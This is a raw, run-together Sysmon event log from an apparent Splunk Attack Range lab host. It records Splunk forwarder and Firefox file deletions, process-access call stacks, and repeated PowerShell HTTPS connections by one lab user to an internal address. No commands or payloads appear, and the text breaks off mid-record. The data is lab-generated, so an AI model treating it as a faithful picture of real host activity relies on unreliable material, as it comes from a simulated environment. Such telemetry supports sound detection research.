Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=11D572FCB49EF9F28E3AE7B8D3CCA464,SHA256=AC039C49DD8BF39E65BC7785E44F92C517429447085BAD82345D9990B915A01C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496904Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:44.338{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496903Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:44.338{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shmMD5=E80CEB5832C2762043B52953B8FF2719,SHA256=D8AA388A18D7777DBE5E026303FC4770628C3E6FE497C29203BA1FE09476A0BA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496902Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:44.123{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F7CE3B154155C48A0212D25A1735BAE0,SHA256=FC44B845A217F49EC9A20D35671456857934DA9E888C9549F07AA69F8405C56A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496906Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:45.853{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=5574B3A7532EE46F9BE485997338DA38,SHA256=648053FFC10C2148B7CD1F71408E81E846DAAAA74F33CD4B76F7582E4BA60248,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496905Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:45.187{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9D515E7E9B2C271887B8E86DB73BB874,SHA256=A79D1103A22030113F80090FDAC2657F1573F9E5214A1F5B78455C98C0EFE04D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496909Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:16.520{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50472-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000036496908Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:15.904{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50471-false10.0.1.12-8000- 23542300x800000000000000036496907Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:46.221{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D6B4349F34578C103EC8FA1E933ABB2A,SHA256=8E458A5E8E9FD2BCB8FF1C87E6E58C60F310D9F5BD522F2A5661A715D3C8D4FA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496910Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:47.251{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=25B9B8D404BAA6282225A46648C969D1,SHA256=360FC57909D9B73B6124AA20E49BCB60A994F8A2B889311A266F48CB671DF18E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496911Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:48.303{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A2FE81C5493A7CE5AEE01CFB3CBFA918,SHA256=08193853FD346220FEDA79D29F9F44179094575D1E2A0710AFF36CD592388FE3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496912Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:49.333{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4E57E4253D9A242CEAFD898867483B0B,SHA256=F42939659A397AED1C6F168F276B31CD3434610715015935C8F88D91F0AE1BB1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496914Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:50.882{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=7E60483420CE7B1A8D1BA427A676274B,SHA256=D597AF213A8D89A8F3F6120514FB265717804C3D0600E59A776221740E2BD9F1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496913Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:50.363{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C72BB476388C9F7CD92DA57E57679517,SHA256=A937716C53FAA719E5CF6A6B10DE40CC70DA5EC4FA95B8C48B9D90B8F39E5276,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496916Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:51.400{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FEDB4A29B55D8CB0B0395F80DA0AAE55,SHA256=8282155256606F2C0650CE7BB97B9911024F086284D8EA0D01C376F92D308DDF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496915Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:20.915{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50473-false10.0.1.12-8000- 23542300x800000000000000036496918Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:52.414{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=36A1924E6B86D7FC7FDB4FE513A7D400,SHA256=F001F716F00E8E6142FB521F5DFC3DFE3BC552E30DB156C86FDD18FF37D65F37,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496917Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:21.532{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50474-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036496919Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:53.478{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2C1CC492279CE72E71A575A70CA491BF,SHA256=C8B61663559A248E7B61D9C32707D5EC7412F0AFF1CE99FE405336F44182C53F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496920Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:54.496{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1258156B51811B5F27B67CF3E2E09359,SHA256=5042CFF9F8EEC40B0EDBB03A586562E0D71413742FC16DC67FABF8238ABA6B24,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496922Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:55.876{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=EE665A8591F64439AC1772B380813ADE,SHA256=3E6636C50B0252D4C33FEE9935022B3AB41615FD4C9D210DABBED923D637854A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496921Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:55.510{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AEDBCDCDB9725B406236DED346EF4750,SHA256=586B1CE87B8F5818112B35DA69D2EF346FC51D3AC2FCFBB3A22A3D9CB68FA86A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496924Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:56.540{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=919AE61F080075EBC05F69049A6093E9,SHA256=3E3D6807FDAA80F639352B238EB2D7F80F49735A5BDCCE8ACC7FF127B989C16A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496923Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:25.941{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50475-false10.0.1.12-8000- 23542300x800000000000000036496926Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:57.554{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A30606D2839641E9F627FE93F15011E3,SHA256=459B0BD6A6C0A42089DC15D8627B66B62535F7E8F8C5B2841175DA294CD160D5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496925Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:26.540{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50476-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036496927Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:58.573{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C1252C418FA1AE42EC8EE8959C6379C9,SHA256=BEF02C369077684AC649CDB2AF7B26C92C8E18B6AF8DBF7C69B81445273B6DB5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496929Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:59.890{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=8F2502657B7E5389219E853D32808678,SHA256=D895EDD7A9207744ADC5BC7E207AEB128B5B148ACC99CFFA9C5B70A08BB81693,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496928Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:59.621{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E44F4EA9D278BB49C6DD9CA0F912AE72,SHA256=A4D6F0438D5B3D54AC9FD29C72A3E2B1C9DF7DA042927DCBF6CFA2113867DD62,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496930Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:00.669{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=708537823E55842E121B77EAA838CB09,SHA256=927DA44BD759F3169D904899E7E3D604267001B9619B0D0731AE77D4C9484A01,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496933Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:01.688{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=42D22FB4B1825435DFBF5D939A4B86C0,SHA256=1E989387782D6AEBB7A888E187F7F099AED2478834EAD258A3655FB873BA1161,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496932Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:31.918{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50478-false10.0.1.12-8000- 354300x800000000000000036496931Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:30.551{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50477-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036496934Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:02.718{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C390410207E02721F48B3E5318285753,SHA256=90EDC2911A9213935AACE6B6E8B548911B880C4DF9A3B9068548439D917BEE50,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496935Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:03.733{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=13BF3952BE1D361C12710BA522AB8958,SHA256=2DE97DBC2E35E67393364FA34AE48594903262E00072B01A87B97C7A5B2F1725,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496937Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:04.953{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=744C0FC56B627B4AD685625B307CD98A,SHA256=9CFC19BC321B46EC1C8D2027C144F26E02087361229C093D6CEAF314B3AEBA24,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496936Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:04.737{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=99759FB548D2E46D99802CEBCA1893C5,SHA256=7C20FF6A171361B613C4588E1C8353346E0DD171FDA3FA51D26393EA621B1F32,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496938Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:05.771{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4C7E3B65B2AF4A604F09DC7E623B12F2,SHA256=020E04608D2FCF495211F4D15DC09F543EFFBB5809349A6323EAF67577150E66,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496940Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:06.853{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E33E2F101B30507B92F2B703B2DCD44F,SHA256=F29044C936DB9E5902C27E7A7CF9AA6D8B581B81009F8C9320F5F7FD22E236ED,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496939Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:35.570{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50479-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 10341000x800000000000000036496949Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:07.989{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A05B-6140-6E56-04000000C801}5448C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496948Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:07.973{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496947Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:07.973{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496946Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:07.973{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496945Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:07.973{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496944Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:07.973{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-A05B-6140-6E56-04000000C801}5448C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036496943Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:07.973{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A05B-6140-6E56-04000000C801}5448C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036496942Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 